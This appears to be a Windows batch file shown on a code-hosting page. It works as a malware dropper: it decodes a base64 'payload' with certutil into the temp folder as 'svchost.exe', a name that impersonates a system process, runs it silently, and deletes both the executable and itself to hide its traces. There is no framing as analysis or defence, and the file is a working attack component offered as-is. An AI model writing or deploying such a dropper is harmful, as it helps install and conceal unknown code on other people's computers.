6 lines
149 B
Batchfile
6 lines
149 B
Batchfile
@echo off
|
|
certutil -decode "%~dp0payload.b64" "%temp%\svchost.exe" >nul 2>&1
|
|
start "" "%temp%\svchost.exe"
|
|
del "%temp%\svchost.exe" 2>nul
|
|
del "%~f0"
|